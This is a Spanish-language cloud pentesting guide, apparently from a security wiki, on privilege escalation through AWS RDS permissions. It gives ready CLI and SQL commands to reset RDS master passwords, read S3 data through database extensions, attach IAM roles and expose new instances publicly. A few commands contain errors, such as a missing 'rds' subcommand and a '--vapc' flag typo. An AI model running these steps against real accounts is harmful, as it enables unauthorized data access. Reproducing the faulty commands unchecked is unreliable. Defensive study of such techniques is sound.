RDS - Servicio de base de datos relacional

Para obtener más información sobre RDS, consulta:

rds:ModifyDBInstance

Con ese permiso, un atacante puede modificar la contraseña del usuario maestro y el inicio de sesión dentro de la base de datos:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Impacto potencial: Encontrar información sensible dentro de las bases de datos.

rds-db:connect

Según la documentación un usuario con este permiso podría conectarse a la instancia de la base de datos.

Abuso de permisos IAM del rol RDS

Postgresql (Aurora)

Primero puedes verificar si esta base de datos ha sido utilizada para acceder a algún otro servicio de AWS. Podrías verificar esto observando las extensiones instaladas:

SELECT * FROM pg_extension;

Si encuentras algo como aws_s3 puedes asumir que esta base de datos tiene algún tipo de acceso sobre S3 (hay otras extensiones como aws_ml y aws_lambda).

Además, si tienes permisos para ejecutar aws rds describe-db-clusters puedes ver si el clúster tiene algún Rol IAM adjunto en el campo AssociatedRoles. Si hay alguno, puedes asumir que la base de datos fue preparada para acceder a otros servicios de AWS. Basándote en el nombre del rol (o si puedes obtener los permisos del rol) podrías adivinar qué acceso adicional tiene la base de datos.

Ahora, para leer un archivo dentro de un bucket necesitas conocer la ruta completa. Puedes leerlo con:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Si tuvieras credenciales de AWS en bruto también podrías usarlas para acceder a datos de S3 con:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Mysql (Aurora)

Dentro del mysql ejecuta show variables; y si las variables como aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role tienen valores, puedes asumir que la base de datos está preparada para acceder a datos de S3.

Además, si tienes permisos para ejecutar aws rds describe-db-clusters puedes verificar si el clúster tiene algún rol asociado, lo que generalmente significa acceso a los servicios de AWS).

Ahora, para leer un archivo dentro de un bucket necesitas conocer la ruta completa. Puedes leerlo con:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

Un atacante con los permisos rds:AddRoleToDBCluster e iam:PassRole puede agregar un rol especificado a una instancia de RDS existente. Esto podría permitir al atacante acceder a datos sensibles o modificar los datos dentro de la instancia.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Impacto Potencial: Acceso a datos sensibles o modificaciones no autorizadas a los datos en la instancia de RDS. Tenga en cuenta que algunas bases de datos requieren configuraciones adicionales como Mysql, que necesita especificar el ARN del rol en los grupos de parámetros también.

rds:CreateDBInstance

Solo con este permiso, un atacante podría crear una nueva instancia dentro de un clúster que ya existe y tiene un rol IAM adjunto. No podrá cambiar la contraseña del usuario principal, pero podría exponer la nueva instancia de la base de datos a Internet:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

Un atacante con los permisos rds:CreateDBInstance e iam:PassRole puede crear una nueva instancia de RDS con un rol especificado adjunto. El atacante luego puede potencialmente acceder a datos sensibles o modificar los datos dentro de la instancia.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Impacto potencial: Acceso a datos sensibles o modificaciones no autorizadas en los datos de la instancia de RDS.

rds:AddRoleToDBInstance, iam:PassRole

Un atacante con los permisos rds:AddRoleToDBInstance e iam:PassRole puede agregar un rol especificado a una instancia de RDS existente. Esto podría permitir al atacante acceder a datos sensibles o modificar los datos dentro de la instancia.

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Impacto potencial: Acceso a datos sensibles o modificaciones no autorizadas en la instancia de RDS.